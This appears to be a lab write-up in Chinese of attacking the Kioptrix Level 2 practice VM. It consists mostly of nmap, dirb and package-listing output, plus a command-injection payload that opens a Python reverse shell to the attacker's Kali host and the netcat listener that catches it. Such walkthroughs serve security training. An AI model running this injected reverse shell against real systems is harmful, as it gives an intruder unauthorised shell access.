kali IP 192.168.1.128
靶机IP 192.168.1.130
sudo nmap --min-rate 10000 -p- 192.168.1.131
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-23 17:17 CST
Nmap scan report for 192.168.1.131
Host is up (0.0016s latency).
Not shown: 65528 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
443/tcp open https
628/tcp open qmqp
631/tcp open ipp
3306/tcp open mysql
老规矩,探测端口服务,TCP,UDP
sudo nmap -sT -sV -O -p22,80,111,443,628,631,3306 192.168.1.131
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-23 17:19 CST
Nmap scan report for 192.168.1.131
Host is up (0.00035s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
80/tcp open http Apache httpd 2.0.52 ((CentOS))
111/tcp open rpcbind 2 (RPC #100000)
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
628/tcp open status 1 (RPC #100024)
631/tcp open ipp CUPS 1.1
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:53:19:4C (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop
sudo nmap -sU -p22,80,111,443,628,631,3306 192.168.1.131
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-23 17:20 CST
Nmap scan report for 192.168.1.131
Host is up (0.00033s latency).
PORT STATE SERVICE
22/udp closed ssh
80/udp closed http
111/udp open rpcbind
443/udp closed https
628/udp closed qmqp
631/udp open|filtered ipp
3306/udp closed mysql
访问80端口,443端口,图就不贴了,注意用wapplayzer看一下web架构就行。wapplayzer这是一个浏览器插件,直接在浏览器扩展搜索并添加到工具栏。
扫描目录
sudo dirb http://192.168.1.131
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Aug 23 17:25:09 2023
URL_BASE: http://192.168.1.131/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.131/ ----
+ http://192.168.1.131/cgi-bin/ (CODE:403|SIZE:289)
+ http://192.168.1.131/index.php (CODE:200|SIZE:667)
==> DIRECTORY: http://192.168.1.131/manual/
+ http://192.168.1.131/usage (CODE:403|SIZE:286)
---- Entering directory: http://192.168.1.131/manual/ ----
==> DIRECTORY: http://192.168.1.131/manual/de/
==> DIRECTORY: http://192.168.1.131/manual/developer/
==> DIRECTORY: http://192.168.1.131/manual/en/
==> DIRECTORY: http://192.168.1.131/manual/faq/
==> DIRECTORY: http://192.168.1.131/manual/fr/
==> DIRECTORY: http://192.168.1.131/manual/howto/
==> DIRECTORY: http://192.168.1.131/manual/images/
+ http://192.168.1.131/manual/index.html (CODE:200|SIZE:7234)
==> DIRECTORY: http://192.168.1.131/manual/ja/
==> DIRECTORY: http://192.168.1.131/manual/ko/
+ http://192.168.1.131/manual/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.1.131/manual/misc/
==> DIRECTORY: http://192.168.1.131/manual/mod/
==> DIRECTORY: http://192.168.1.131/manual/programs/
==> DIRECTORY: http://192.168.1.131/manual/ru/
==> DIRECTORY: http://192.168.1.131/manual/ssl/
==> DIRECTORY: http://192.168.1.131/manual/style/
---- Entering directory: http://192.168.1.131/manual/de/ ----
+ http://192.168.1.131/manual/de/de (CODE:301|SIZE:317)
==> DIRECTORY: http://192.168.1.131/manual/de/developer/
+ http://192.168.1.131/manual/de/en (CODE:301|SIZE:317)
==> DIRECTORY: http://192.168.1.131/manual/de/faq/
+ http://192.168.1.131/manual/de/fr (CODE:301|SIZE:317)
==> DIRECTORY: http://192.168.1.131/manual/de/howto/
==> DIRECTORY: http://192.168.1.131/manual/de/images/
+ http://192.168.1.131/manual/de/index.html (CODE:200|SIZE:7317)
+ http://192.168.1.131/manual/de/ja (CODE:301|SIZE:317)
+ http://192.168.1.131/manual/de/ko (CODE:301|SIZE:317)
+ http://192.168.1.131/manual/de/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.1.131/manual/de/misc/
==> DIRECTORY: http://192.168.1.131/manual/de/mod/
==> DIRECTORY: http://192.168.1.131/manual/de/programs/
+ http://192.168.1.131/manual/de/ru (CODE:301|SIZE:317)
==> DIRECTORY: http://192.168.1.131/manual/de/ssl/
==> DIRECTORY: http://192.168.1.131/manual/de/style/
---- Entering directory: http://192.168.1.131/manual/developer/ ----
+ http://192.168.1.131/manual/developer/index.html (CODE:200|SIZE:4770)
---- Entering directory: http://192.168.1.131/manual/en/ ----
+ http://192.168.1.131/manual/en/de (CODE:301|SIZE:317)
==> DIRECTORY: http://192.168.1.131/manual/en/developer/
+ http://192.168.1.131/manual/en/en (CODE:301|SIZE:317)
==> DIRECTORY: http://192.168.1.131/manual/en/faq/
+ http://192.168.1.131/manual/en/fr (CODE:301|SIZE:317)
==> DIRECTORY: http://192.168.1.131/manual/en/howto/
==> DIRECTORY: http://192.168.1.131/manual/en/images/
+ http://192.168.1.131/manual/en/index.html (CODE:200|SIZE:7234)
+ http://192.168.1.131/manual/en/ja (CODE:301|SIZE:317)
+ http://192.168.1.131/manual/en/ko (CODE:301|SIZE:317)
+ http://192.168.1.131/manual/en/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.1.131/manual/en/misc/
==> DIRECTORY: http://192.168.1.131/manual/en/mod/
==> DIRECTORY: http://192.168.1.131/manual/en/programs/
+ http://192.168.1.131/manual/en/ru (CODE:301|SIZE:317)
==> DIRECTORY: http://192.168.1.131/manual/en/ssl/
==> DIRECTORY: http://192.168.1.131/manual/en/style/
---- Entering directory: http://192.168.1.131/manual/faq/ ----
+ http://192.168.1.131/manual/faq/index.html (CODE:200|SIZE:3564)
---- Entering directory: http://192.168.1.131/manual/fr/ ----
+ http://192.168.1.131/manual/fr/de (CODE:301|SIZE:317)
==> DIRECTORY: http://192.168.1.131/manual/fr/developer/
+ http://192.168.1.131/manual/fr/en (CODE:301|SIZE:317)
==> DIRECTORY: http://192.168.1.131/manual/fr/faq/
+ http://192.168.1.131/manual/fr/fr (CODE:301|SIZE:317)
==> DIRECTORY: http://192.168.1.131/manual/fr/howto/
==> DIRECTORY: http://192.168.1.131/manual/fr/images/
+ http://192.168.1.131/manual/fr/index.html (CODE:200|SIZE:7234)
+ http://192.168.1.131/manual/fr/ja (CODE:301|SIZE:317)
+ http://192.168.1.131/manual/fr/ko (CODE:301|SIZE:317)
+ http://192.168.1.131/manual/fr/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.1.131/manual/fr/misc/
==> DIRECTORY: http://192.168.1.131/manual/fr/mod/
==> DIRECTORY: http://192.168.1.131/manual/fr/programs/
+ http://192.168.1.131/manual/fr/ru (CODE:301|SIZE:317)
==> DIRECTORY: http://192.168.1.131/manual/fr/ssl/
==> DIRECTORY: http://192.168.1.131/manual/fr/style/
---- Entering directory: http://192.168.1.131/manual/howto/ ----
+ http://192.168.1.131/manual/howto/index.html (CODE:200|SIZE:5685)
---- Entering directory: http://192.168.1.131/manual/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.131/manual/ja/ ----
+ http://192.168.1.131/manual/ja/de (CODE:301|SIZE:317)
==> DIRECTORY: http://192.168.1.131/manual/ja/developer/
+ http://192.168.1.131/manual/ja/en (CODE:301|SIZE:317)
==> DIRECTORY: http://192.168.1.131/manual/ja/faq/
+ http://192.168.1.131/manual/ja/fr (CODE:301|SIZE:317)
==> DIRECTORY: http://192.168.1.131/manual/ja/howto/
==> DIRECTORY: http://192.168.1.131/manual/ja/images/
+ http://192.168.1.131/manual/ja/index.html (CODE:200|SIZE:7227)
+ http://192.168.1.131/manual/ja/ja (CODE:301|SIZE:317)
+ http://192.168.1.131/manual/ja/ko (CODE:301|SIZE:317)
+ http://192.168.1.131/manual/ja/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.1.131/manual/ja/misc/
==> DIRECTORY: http://192.168.1.131/manual/ja/mod/
==> DIRECTORY: http://192.168.1.131/manual/ja/programs/
+ http://192.168.1.131/manual/ja/ru (CODE:301|SIZE:317)
==> DIRECTORY: http://192.168.1.131/manual/ja/ssl/
==> DIRECTORY: http://192.168.1.131/manual/ja/style/
---- Entering directory: http://192.168.1.131/manual/ko/ ----
+ http://192.168.1.131/manual/ko/de (CODE:301|SIZE:317)
==> DIRECTORY: http://192.168.1.131/manual/ko/developer/
+ http://192.168.1.131/manual/ko/en (CODE:301|SIZE:317)
==> DIRECTORY: http://192.168.1.131/manual/ko/faq/
+ http://192.168.1.131/manual/ko/fr (CODE:301|SIZE:317)
==> DIRECTORY: http://192.168.1.131/manual/ko/howto/
==> DIRECTORY: http://192.168.1.131/manual/ko/images/
+ http://192.168.1.131/manual/ko/index.html (CODE:200|SIZE:6954)
+ http://192.168.1.131/manual/ko/ja (CODE:301|SIZE:317)
+ http://192.168.1.131/manual/ko/ko (CODE:301|SIZE:317)
+ http://192.168.1.131/manual/ko/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.1.131/manual/ko/misc/
==> DIRECTORY: http://192.168.1.131/manual/ko/mod/
==> DIRECTORY: http://192.168.1.131/manual/ko/programs/
+ http://192.168.1.131/manual/ko/ru (CODE:301|SIZE:317)
==> DIRECTORY: http://192.168.1.131/manual/ko/ssl/
==> DIRECTORY: http://192.168.1.131/manual/ko/style/
---- Entering directory: http://192.168.1.131/manual/misc/ ----
+ http://192.168.1.131/manual/misc/index.html (CODE:200|SIZE:5491)
---- Entering directory: http://192.168.1.131/manual/mod/ ----
+ http://192.168.1.131/manual/mod/index.html (CODE:200|SIZE:13437)
---- Entering directory: http://192.168.1.131/manual/programs/ ----
+ http://192.168.1.131/manual/programs/index.html (CODE:200|SIZE:4664)
---- Entering directory: http://192.168.1.131/manual/ru/ ----
+ http://192.168.1.131/manual/ru/de (CODE:301|SIZE:317)
==> DIRECTORY: http://192.168.1.131/manual/ru/developer/
+ http://192.168.1.131/manual/ru/en (CODE:301|SIZE:317)
==> DIRECTORY: http://192.168.1.131/manual/ru/faq/
+ http://192.168.1.131/manual/ru/fr (CODE:301|SIZE:317)
==> DIRECTORY: http://192.168.1.131/manual/ru/howto/
==> DIRECTORY: http://192.168.1.131/manual/ru/images/
+ http://192.168.1.131/manual/ru/index.html (CODE:200|SIZE:7277)
+ http://192.168.1.131/manual/ru/ja (CODE:301|SIZE:317)
+ http://192.168.1.131/manual/ru/ko (CODE:301|SIZE:317)
+ http://192.168.1.131/manual/ru/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.1.131/manual/ru/misc/
==> DIRECTORY: http://192.168.1.131/manual/ru/mod/
==> DIRECTORY: http://192.168.1.131/manual/ru/programs/
+ http://192.168.1.131/manual/ru/ru (CODE:301|SIZE:317)
==> DIRECTORY: http://192.168.1.131/manual/ru/ssl/
==> DIRECTORY: http://192.168.1.131/manual/ru/style/
---- Entering directory: http://192.168.1.131/manual/ssl/ ----
+ http://192.168.1.131/manual/ssl/index.html (CODE:200|SIZE:3988)
---- Entering directory: http://192.168.1.131/manual/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.131/manual/de/developer/ ----
+ http://192.168.1.131/manual/de/developer/index.html (CODE:200|SIZE:4770)
---- Entering directory: http://192.168.1.131/manual/de/faq/ ----
+ http://192.168.1.131/manual/de/faq/index.html (CODE:200|SIZE:3564)
---- Entering directory: http://192.168.1.131/manual/de/howto/ ----
+ http://192.168.1.131/manual/de/howto/index.html (CODE:200|SIZE:5685)
---- Entering directory: http://192.168.1.131/manual/de/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.131/manual/de/misc/ ----
+ http://192.168.1.131/manual/de/misc/index.html (CODE:200|SIZE:5491)
---- Entering directory: http://192.168.1.131/manual/de/mod/ ----
+ http://192.168.1.131/manual/de/mod/index.html (CODE:200|SIZE:13561)
---- Entering directory: http://192.168.1.131/manual/de/programs/ ----
+ http://192.168.1.131/manual/de/programs/index.html (CODE:200|SIZE:4664)
---- Entering directory: http://192.168.1.131/manual/de/ssl/ ----
+ http://192.168.1.131/manual/de/ssl/index.html (CODE:200|SIZE:3988)
---- Entering directory: http://192.168.1.131/manual/de/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.131/manual/en/developer/ ----
+ http://192.168.1.131/manual/en/developer/index.html (CODE:200|SIZE:4770)
---- Entering directory: http://192.168.1.131/manual/en/faq/ ----
+ http://192.168.1.131/manual/en/faq/index.html (CODE:200|SIZE:3564)
---- Entering directory: http://192.168.1.131/manual/en/howto/ ----
+ http://192.168.1.131/manual/en/howto/index.html (CODE:200|SIZE:5685)
---- Entering directory: http://192.168.1.131/manual/en/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.131/manual/en/misc/ ----
+ http://192.168.1.131/manual/en/misc/index.html (CODE:200|SIZE:5491)
---- Entering directory: http://192.168.1.131/manual/en/mod/ ----
+ http://192.168.1.131/manual/en/mod/index.html (CODE:200|SIZE:13437)
---- Entering directory: http://192.168.1.131/manual/en/programs/ ----
+ http://192.168.1.131/manual/en/programs/index.html (CODE:200|SIZE:4664)
---- Entering directory: http://192.168.1.131/manual/en/ssl/ ----
+ http://192.168.1.131/manual/en/ssl/index.html (CODE:200|SIZE:3988)
---- Entering directory: http://192.168.1.131/manual/en/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.131/manual/fr/developer/ ----
+ http://192.168.1.131/manual/fr/developer/index.html (CODE:200|SIZE:4770)
---- Entering directory: http://192.168.1.131/manual/fr/faq/ ----
+ http://192.168.1.131/manual/fr/faq/index.html (CODE:200|SIZE:3564)
---- Entering directory: http://192.168.1.131/manual/fr/howto/ ----
+ http://192.168.1.131/manual/fr/howto/index.html (CODE:200|SIZE:5685)
---- Entering directory: http://192.168.1.131/manual/fr/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.131/manual/fr/misc/ ----
+ http://192.168.1.131/manual/fr/misc/index.html (CODE:200|SIZE:5491)
---- Entering directory: http://192.168.1.131/manual/fr/mod/ ----
+ http://192.168.1.131/manual/fr/mod/index.html (CODE:200|SIZE:13437)
---- Entering directory: http://192.168.1.131/manual/fr/programs/ ----
+ http://192.168.1.131/manual/fr/programs/index.html (CODE:200|SIZE:4664)
---- Entering directory: http://192.168.1.131/manual/fr/ssl/ ----
+ http://192.168.1.131/manual/fr/ssl/index.html (CODE:200|SIZE:3988)
---- Entering directory: http://192.168.1.131/manual/fr/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.131/manual/ja/developer/ ----
+ http://192.168.1.131/manual/ja/developer/index.html (CODE:200|SIZE:4770)
---- Entering directory: http://192.168.1.131/manual/ja/faq/ ----
+ http://192.168.1.131/manual/ja/faq/index.html (CODE:200|SIZE:3564)
---- Entering directory: http://192.168.1.131/manual/ja/howto/ ----
+ http://192.168.1.131/manual/ja/howto/index.html (CODE:200|SIZE:5607)
---- Entering directory: http://192.168.1.131/manual/ja/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.131/manual/ja/misc/ ----
+ http://192.168.1.131/manual/ja/misc/index.html (CODE:200|SIZE:5491)
---- Entering directory: http://192.168.1.131/manual/ja/mod/ ----
+ http://192.168.1.131/manual/ja/mod/index.html (CODE:200|SIZE:13298)
---- Entering directory: http://192.168.1.131/manual/ja/programs/ ----
+ http://192.168.1.131/manual/ja/programs/index.html (CODE:200|SIZE:4664)
---- Entering directory: http://192.168.1.131/manual/ja/ssl/ ----
+ http://192.168.1.131/manual/ja/ssl/index.html (CODE:200|SIZE:3957)
---- Entering directory: http://192.168.1.131/manual/ja/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.131/manual/ko/developer/ ----
+ http://192.168.1.131/manual/ko/developer/index.html (CODE:200|SIZE:4770)
---- Entering directory: http://192.168.1.131/manual/ko/faq/ ----
+ http://192.168.1.131/manual/ko/faq/index.html (CODE:200|SIZE:3371)
---- Entering directory: http://192.168.1.131/manual/ko/howto/ ----
+ http://192.168.1.131/manual/ko/howto/index.html (CODE:200|SIZE:5299)
---- Entering directory: http://192.168.1.131/manual/ko/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.131/manual/ko/misc/ ----
+ http://192.168.1.131/manual/ko/misc/index.html (CODE:200|SIZE:5491)
---- Entering directory: http://192.168.1.131/manual/ko/mod/ ----
+ http://192.168.1.131/manual/ko/mod/index.html (CODE:200|SIZE:12795)
---- Entering directory: http://192.168.1.131/manual/ko/programs/ ----
+ http://192.168.1.131/manual/ko/programs/index.html (CODE:200|SIZE:4543)
---- Entering directory: http://192.168.1.131/manual/ko/ssl/ ----
+ http://192.168.1.131/manual/ko/ssl/index.html (CODE:200|SIZE:3988)
---- Entering directory: http://192.168.1.131/manual/ko/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.131/manual/ru/developer/ ----
+ http://192.168.1.131/manual/ru/developer/index.html (CODE:200|SIZE:4770)
---- Entering directory: http://192.168.1.131/manual/ru/faq/ ----
+ http://192.168.1.131/manual/ru/faq/index.html (CODE:200|SIZE:3564)
---- Entering directory: http://192.168.1.131/manual/ru/howto/ ----
+ http://192.168.1.131/manual/ru/howto/index.html (CODE:200|SIZE:5685)
---- Entering directory: http://192.168.1.131/manual/ru/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.131/manual/ru/misc/ ----
+ http://192.168.1.131/manual/ru/misc/index.html (CODE:200|SIZE:5491)
---- Entering directory: http://192.168.1.131/manual/ru/mod/ ----
+ http://192.168.1.131/manual/ru/mod/index.html (CODE:200|SIZE:13437)
---- Entering directory: http://192.168.1.131/manual/ru/programs/ ----
+ http://192.168.1.131/manual/ru/programs/index.html (CODE:200|SIZE:5016)
---- Entering directory: http://192.168.1.131/manual/ru/ssl/ ----
+ http://192.168.1.131/manual/ru/ssl/index.html (CODE:200|SIZE:3988)
---- Entering directory: http://192.168.1.131/manual/ru/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
主要都是 Apache默认页面。主要还要看主页面的登录框
burp试一下爆破,弱口令没有爆出来
尝试sql注入
分别判断字符型和数字型 过滤措施 或者尝试sqlmap
初步尝试未字符型无过滤,拿到命令注入框
尝试反弹shell
127.0.0.1&&python -c 'import os,socket,sys,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.128",9999));[os.dup2(s.fileno(),fd)for fd in (0,1,2)];pty.spawn("/bin/bash");'
同时kali开启监听
nc -lvp 9999
listening on [any] 9999 ...
192.168.1.131: inverse host lookup failed: Unknown host
connect to [192.168.1.128] from (UNKNOWN) [192.168.1.131] 32771
bash-3.00$ whoami
whoami
apache
bash-3.00$
提权信息收集
lsb_release -a 检测操作系统发行版本
bash-3.00$ lsb_release -a
lsb_release -a
LSB Version: :core-3.0-ia32:core-3.0-noarch:graphics-3.0-ia32:graphics-3.0-noarch
Distributor ID: CentOS
Description: CentOS release 4.5 (Final)
Release: 4.5
Codename: Final
uname -a 检测内核版本
uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
查看已安装的包,程序,运行的服务,过期版本一般有漏洞. rpm -aq
rpm -aq
libgcc-3.4.6-8
filesystem-2.3.0-1
glibc-common-2.3.4-2.36
bzip2-libs-1.0.2-13.EL4.3
ethtool-1.8-4
hdparm-5.7-2
libcap-1.10-20
checkpolicy-1.17.5-1
libtermcap-2.0.8-39
audit-1.0.15-3.EL4
keyutils-1.0-2
pcre-4.5-3.2.RHEL4
psmisc-21.4-4.1
newt-0.51.6-9.rhel4
vim-minimal-6.3.046-0.40E.7
cpio-2.5-13.RHEL4
gawk-3.1.3-10.1
grub-0.95-3.8
module-init-tools-3.1-0.pre5.3.4
lvm2-2.02.21-5.el4
rpm-libs-4.3.3-22_nonptl
dbus-glib-0.22-12.EL.9
tar-1.14-12.RHEL4
authconfig-4.6.10-rhel4.3
SysVinit-2.85-34.4
kudzu-1.1.95.22-1
initscripts-7.93.29.EL-1.centos4
openldap-2.2.13-7.4E
usermode-1.74-2
mailcap-2.1.17-1
specspo-9.0.92-1.3
dosfstools-2.8-18
glib-1.2.10-15
acl-2.2.23-5.3.el4
libusb-0.1.8-3
bluez-bluefw-1.0-6
lksctp-tools-1.0.2-6.4E.1
openib-1.1-7
OpenIPMI-libs-1.4.14-1.4E.17
patch-2.5.4-20
fbset-2.1-17
procmail-3.22-14
htmlview-3.0.0-8
setarch-1.6-1
statserial-1.1-35
librdmacm-0.9.1-7
telnet-0.17-31.EL4.3
unzip-5.51-9.EL4.5
crash-4.0-3.9
gpm-1.20.1-71.RHEL4
krbafs-1.2.2-6
libxslt-1.1.11-1
man-1.5o1-10.rhel4
nano-1.2.4-1
cups-libs-1.1.22-0.rc1.9.20
pinfo-0.6.8-7
lftp-3.0.6-3
libxml2-python-2.6.16-10
rhnlib-2.1.1-3.el4
nscd-2.3.4-2.36
python-sqlite-1.1.7-1.2.1
tcsh-6.13-9.el4.1
swig-1.3.21-6
xorg-x11-libs-6.8.2-1.EL.18
pam_ccreds-3-3.rhel4.2
apmd-3.0.2-24
dhcpv6_client-0.10-17_EL4
NetworkManager-0.3.1-4.el4
nss_ldap-226-18
openssh-server-3.9p1-8.RHEL4.20
vixie-cron-4.1-44.EL4
mkbootdisk-1.5.2-1
ppp-2.4.2-6.4.RHEL4
system-config-securitylevel-tui-1.4.19.2-1
wvdial-1.54.0-3
ypbind-1.17.2-13
apr-0.9.4-24.5.c4.2
alsa-lib-1.0.6-5.RHEL4
perl-DBI-1.40-8
tux-3.2.18-2
curl-7.12.1-11.el4
pyorbit-2.0.1-1
unixODBC-2.2.11-1.RHEL4.1
GConf2-2.8.1-1
pygtk2-2.4.0-1
libbonoboui-2.8.0.99cvs20040929-2
gnome-python2-canvas-2.6.0-3
httpd-suexec-2.0.52-32.ent.centos4
system-config-httpd-1.3.1-1
perl-HTML-Tagset-3.03-30
perl-libxml-perl-0.07-30
chkfontpath-1.10.0-2
xorg-x11-xauth-6.8.2-1.EL.18
system-config-securitylevel-1.4.19.2-1
sox-12.17.5-3
system-config-language-1.1.8-4
system-config-users-1.2.27-0.EL4.4
cpp-3.4.6-8
fonts-xorg-75dpi-6.8.2-1.EL
libungif-4.1.3-1.el4.2
emacs-common-21.3-19.EL.4
kudzu-devel-1.1.95.22-1
expat-devel-1.95.7-4
libacl-devel-2.2.23-5.3.el4
libselinux-devel-1.19.1-7.3
libstdc++-devel-3.4.6-8
boost-1.32.0-6.rhel4
kernel-hugemem-devel-2.6.9-55.EL
cscope-15.5-9.RHEL4
patchutils-0.2.30-1
perl-XML-SAX-0.12-7
glib2-devel-2.4.7-1
strace-4.5.15-1.el4.1
e2fsprogs-devel-1.35-12.5.el4
gpm-devel-1.20.1-71.RHEL4
krbafs-devel-1.2.2-6
automake-1.9.2-3
perl-Crypt-SSLeay-0.51-5
cdecl-2.5-30
lockdev-devel-1.0.1-6.2
newt-devel-0.51.6-9.rhel4
zlib-devel-1.2.1.2-1.2
pam-devel-0.77-66.21
glibc-devel-2.3.4-2.36
gcc-java-3.4.6-8
lksctp-tools-devel-1.0.2-6.4E.1
oprofile-0.8.1-26
tog-pegasus-devel-2.5.1-2.EL4
libdbi-dbd-mysql-0.6.5-10.RHEL4.1
MyODBC-2.50.39-25.RHEL4.1
OpenIPMI-tools-1.4.14-1.4E.17
ckermit-8.0.209-9
wireshark-0.99.5-EL4.1
php-pear-4.3.9-3.26
mysql-devel-4.1.22-2.el4
dmraid-1.0.0.rc14-5_RHEL4_U5
indexhtml-4-2.centos4
redhat-logos-1.1.26-1.centos4.4
setup-2.5.37-1.3
basesystem-8.0-4
tzdata-2007d-1.el4
glibc-2.3.4-2.36
beecrypt-3.1.0-6
chkconfig-1.3.13.5.EL4-1
elfutils-libelf-0.97.1-4
expat-1.95.7-4
glib2-2.4.7-1
keyutils-libs-1.0-2
libacl-2.2.23-5.3.el4
libselinux-1.19.1-7.3
libsepol-1.1.1-2
libstdc++-3.4.6-8
gmp-4.1.4-3
mingetty-1.07-3
bash-3.0-19.3
centos-release-4-4.3
iputils-20020927-19.EL4.5
ncurses-5.4-13
net-tools-1.60-37.EL4.9
perl-5.8.5-36.RHEL4
popt-1.9.1-22_nonptl
rpmdb-CentOS-4.5-0.20070506
slang-1.4.9-8
sysfsutils-1.2.0-1
usbutils-0.11-7.RHEL4.1
zlib-1.2.1.2-1.2
info-4.7-5.el4.2
diffutils-2.8.1-12
findutils-4.1.20-7.el4.3
grep-2.5.1-32.3
ash-0.3.8-20
gzip-1.3.3-16.rhel4
libxml2-2.6.16-10
openssl-0.9.7a-43.16
readline-4.3-13
python-2.3.4-14.4
rhpl-0.148.5-1
sed-4.1.2-6.el4
dbus-0.22-12.EL.9
MAKEDEV-3.15.2-3
sysklogd-1.4.1-26_EL
cracklib-2.8.9-1.3
pam-0.77-66.21
policycoreutils-1.18.1-4.12
setools-2.3-4
util-linux-2.12a-16.EL4.25
hotplug-2004_04_01-7.8
udev-039-10.15.EL4
mkinitrd-4.2.1.10-1.1
cyrus-sasl-2.1.19-5.EL4
kernel-2.6.9-55.EL
libuser-0.52.5-1.el4.1
prelink-0.3.3-0.EL4
kbd-1.12-2.el4.4
cryptsetup-0.1-4
man-pages-1.67-12.EL4
dump-0.4b39-3.EL4.2
bluez-libs-2.10-2
dos2unix-3.1-21.2
eject-2.0.13-11
finger-0.17-26.EL4.1
hesiod-3.0.2-30
attr-2.4.16-3.1.el4
libgpg-error-1.0-1
libjpeg-6b-33
lrzsz-0.12.20-19
mailx-8.1.1-37.EL4
bzip2-1.0.2-13.EL4.3
anacron-2.3-32
mt-st-0.8-1
mtr-0.54-10
libibcommon-1.0.1-7
libsdp-1.1.0-7
opensm-libs-2.0.0-7
pam_smb-1.1.7-5
pax-3.0-9
aspell-en-0.51-11
numactl-0.6.4-1.39
logrotate-3.7.1-6.RHEL4
rdate-1.4-2
redhat-menus-3.7.1-2
rsh-0.17-25.4
schedutils-1.4.0-2
netconfig-0.8.21-1.1
setuptool-1.17-2
symlinks-1.2-22
libmthca-1.0.3.1-7
dapl-1.2.1-7
tcp_wrappers-7.6-37.2
tmpwatch-2.9.1-1
unix2dos-2.2-24.1
wireless-tools-28-0.pre16.3.3.EL4
zip-2.3-27
freetype-2.1.9-5.el4
binutils-2.15.92.0.2-22
groff-1.18.1.1-3.EL4
krb5-workstation-1.3.4-47
libgssapi-0.8-1
libtiff-3.6.1-12
logwatch-5.2.2-2.EL4
make-3.80-6.EL4
mgetty-1.1.31-2
mtools-3.9.9-9
nss_db-2.2-29
bind-utils-9.2.4-24.EL4
net-snmp-libs-5.1.2-11.EL4.10
pdksh-5.2.14-30.3
psacct-6.3.2-39.rhel4
ftp-0.17-23.EL4
parted-1.6.19-16.EL
gettext-0.14.1-13
pyOpenSSL-0.6-1.p23
python-urlgrabber-2.9.8-2
jpackage-utils-1.7.3-1jpp.1.el4
minicom-2.00.0-19
rpm-python-4.3.3-22_nonptl
sqlite-3.3.6-2
stunnel-4.05-3
sysreport-1.3.15-8
time-1.7-25
guile-1.6.4-14
ibutils-1.0-4
wget-1.10.2-0.40E
wpa_supplicant-0.4.9-1.1.el4
xmlsec1-openssl-1.2.6-3
xorg-x11-Mesa-libGL-6.8.2-1.EL.18
libwvstreams-3.75.0-2
pam_krb5-2.1.8-1
acpid-1.0.3-2
bluez-utils-2.10-2.1
dhclient-3.0.1-59.EL4
ipsec-tools-0.3.3-6.rhel4.1
kernel-utils-2.4-13.1.99
autofs-4.1.3-199.3
nfs-utils-lib-1.0.6-8
openssh-3.9p1-8.RHEL4.20
netdump-0.7.16-10
portmap-4.0-63
mdadm-1.12.0-2
iptables-1.2.11-3.1.RHEL4
libpcap-0.8.3-10.RHEL4
nfs-utils-1.0.6-80.EL4
pcmcia-cs-3.2.7-3.5
quota-3.12-6.el4
system-config-network-tui-1.3.22.0.EL.4.2-1
tcpdump-3.8.2-10.RHEL4
vconfig-1.8-4
xinetd-2.3.13-4.4E.1
redhat-lsb-3.0-8.EL
yp-tools-2.8-7
gnome-mime-data-2.4.1-5
atk-1.8.0-2
libIDL-0.8.4-1.centos4
audiofile-0.2.6-1.el4.1
gamin-0.1.7-1.2.EL4
perl-URI-1.30-4
newt-perl-1.08-7
libidn-0.5.6-1
crypto-utils-2.1-4
distcache-1.4.5-6
alchemist-1.0.34-1
PyXML-0.8.3-6
shared-mime-info-0.15-10.1.el4
